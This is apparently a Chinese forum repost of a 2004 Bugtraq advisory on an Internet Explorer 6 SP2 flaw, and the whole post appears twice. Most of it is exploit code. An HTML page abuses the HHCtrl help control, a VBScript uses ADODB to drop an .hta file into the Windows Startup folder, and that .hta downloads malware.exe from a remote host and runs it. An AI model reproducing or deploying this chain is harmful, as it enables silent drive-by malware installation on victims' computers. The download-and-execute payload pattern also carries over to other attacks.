level 7
HappyQQ
楼主
Microsoft Internet Explorer是一款流行的WEB浏览器。Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题,远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶意代码执行。攻击者可以按照如下方法实现:1. 建立一个包含如下代码的WEB页:sp2rc.htm---------------------------------------------------------------------
localpage.HHClick();setTimeout("inject.HHClick()",100);---------------------------------------------------------------------第一个对象(id: localpage)告诉hhctrl.ocx打开一个帮助弹出窗口到C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm位置,选择这个文件是因为它以本地域处理。在部分电脑上在弹出前会显示错误,这是用户唯一的机会防止此漏洞工作。第二个对象(id: inject)告诉帮助弹出窗口操纵javascript协议,执行跨站脚本,脚本标签使用远程文件写此页,并且writehta.txt在不安全本地域中执行。在这个脚本中,HHClick是用于自动化此漏洞。2. Writehta.txt使用adodb recordset写Microsoft Office.hta 到用户启动文件夹中:writehta.txt---------------------------------------------------------------------Dim Conn, rsSet Conn = CreateObject("ADODB.Connection")Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _"Dbq=http://www.malware.com;" & _"Extensions=asc,csv,tab,txt;" & _"Persist Security Info=False"Dim sqlsql = "SELECT * from foobar.txt"set rs = conn.execute(sql)set rs =CreateObject("ADODB.recordset")rs.Open "SELECT * from foobar.txt", connrs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft \Office.hta", adPersistXML rs.closeconn.closewindow.close---------------------------------------------------------------------3. f00bar.txt是由adodb recordset请求文件,由于没有对hta文件做绝对限制,因此可通过请求和保存文件到用户系统上来入侵目标用户:f00bar.txt---------------------------------------------------------------------"meaning less shit i had to put here""
crap = """""": on error resume next: crap = """""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : \crap=""" """ : o.send : crap="""""" : set s = createobject(""adodb.stream"") : crap="""""" : s.type=1 : crap="""""" : s.open : crap="""""" : s.write o.responseBody : crap="""""" : s.savetofile ""C:\malware.exe"",2 : crap="""""" : Set ws = CreateObject(""WScript.Shell"") : crap="""""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""""" crap="""---------------------------------------------------------------------<*来源:Paul ([email protected])链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110400886025348&w=2*>受影响系统:Microsoft Internet Explorer 6.0SP2 - Microsoft Windows XP Professional SP2 - Microsoft Windows XP Home SP2
2004年12月28日 06点12分
1
localpage.HHClick();setTimeout("inject.HHClick()",100);---------------------------------------------------------------------第一个对象(id: localpage)告诉hhctrl.ocx打开一个帮助弹出窗口到C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm位置,选择这个文件是因为它以本地域处理。在部分电脑上在弹出前会显示错误,这是用户唯一的机会防止此漏洞工作。第二个对象(id: inject)告诉帮助弹出窗口操纵javascript协议,执行跨站脚本,脚本标签使用远程文件写此页,并且writehta.txt在不安全本地域中执行。在这个脚本中,HHClick是用于自动化此漏洞。2. Writehta.txt使用adodb recordset写Microsoft Office.hta 到用户启动文件夹中:writehta.txt---------------------------------------------------------------------Dim Conn, rsSet Conn = CreateObject("ADODB.Connection")Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _"Dbq=http://www.malware.com;" & _"Extensions=asc,csv,tab,txt;" & _"Persist Security Info=False"Dim sqlsql = "SELECT * from foobar.txt"set rs = conn.execute(sql)set rs =CreateObject("ADODB.recordset")rs.Open "SELECT * from foobar.txt", connrs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft \Office.hta", adPersistXML rs.closeconn.closewindow.close---------------------------------------------------------------------3. f00bar.txt是由adodb recordset请求文件,由于没有对hta文件做绝对限制,因此可通过请求和保存文件到用户系统上来入侵目标用户:f00bar.txt---------------------------------------------------------------------"meaning less shit i had to put here""
crap = """""": on error resume next: crap = """""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : \crap=""" """ : o.send : crap="""""" : set s = createobject(""adodb.stream"") : crap="""""" : s.type=1 : crap="""""" : s.open : crap="""""" : s.write o.responseBody : crap="""""" : s.savetofile ""C:\malware.exe"",2 : crap="""""" : Set ws = CreateObject(""WScript.Shell"") : crap="""""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""""" crap="""---------------------------------------------------------------------<*来源:Paul ([email protected])链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110400886025348&w=2*>受影响系统:Microsoft Internet Explorer 6.0SP2 - Microsoft Windows XP Professional SP2 - Microsoft Windows XP Home SP2